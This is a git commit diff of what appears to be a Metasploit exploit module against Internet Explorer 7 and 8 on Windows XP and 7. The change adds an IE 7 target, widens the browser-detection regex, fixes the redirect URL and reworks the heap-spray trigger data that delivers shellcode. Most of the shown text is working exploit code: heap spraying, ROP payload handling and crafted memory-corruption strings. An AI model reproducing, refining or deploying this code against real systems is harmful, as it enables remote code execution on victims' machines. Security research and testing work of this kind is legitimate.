commit
855d183926
|
@ -66,8 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 7 on Windows XP SP3', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', {} ],
|
||||
[ 'IE 8 on Windows 7', {} ]
|
||||
[ 'IE 8 on Windows 7', {} ],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -121,7 +122,7 @@ function dll() {
|
|||
}
|
||||
|
||||
window.onload = function() {
|
||||
window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
|
||||
window.location = "#{get_uri.chomp("/")}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
|
||||
}
|
||||
</script>
|
||||
</html>
|
||||
|
@ -204,11 +205,16 @@ window.onload = function() {
|
|||
rop_payload
|
||||
end
|
||||
|
||||
#
|
||||
# IE 6's call is at 6
|
||||
# IE 8's call is at 7
|
||||
# Don't think this one triggers on IE9
|
||||
#
|
||||
def get_sploit_html(target_info)
|
||||
os = target_info[:os]
|
||||
js_payload = ''
|
||||
|
||||
if os =~ /Windows (7|XP) MSIE 8\.0/
|
||||
if os =~ /Windows (7|XP) MSIE [78]\.0/
|
||||
js_payload = Rex::Text.to_unescape(get_payload(target_info))
|
||||
else
|
||||
print_error("Target not supported by this attack.")
|
||||
|
@ -224,8 +230,9 @@ sprayHeap({shellcode:unescape("#{js_payload}")});
|
|||
var earth = document;
|
||||
var data = "";
|
||||
for (i=0; i<17; i++) {
|
||||
if (i==7) { data += unescape("%u2020%u2030"); }
|
||||
else { data += "\\u4141\\u4141"; }
|
||||
if (i==6) { data += unescape("%u2020%u2030"); }
|
||||
else if (i==7) { data += unescape("%u2020%u2030"); }
|
||||
else { data += unescape("%u4141%u4141"); }
|
||||
}
|
||||
data += "\\u4141";
|
||||
|
||||
|
|
Loading…
Reference in New Issue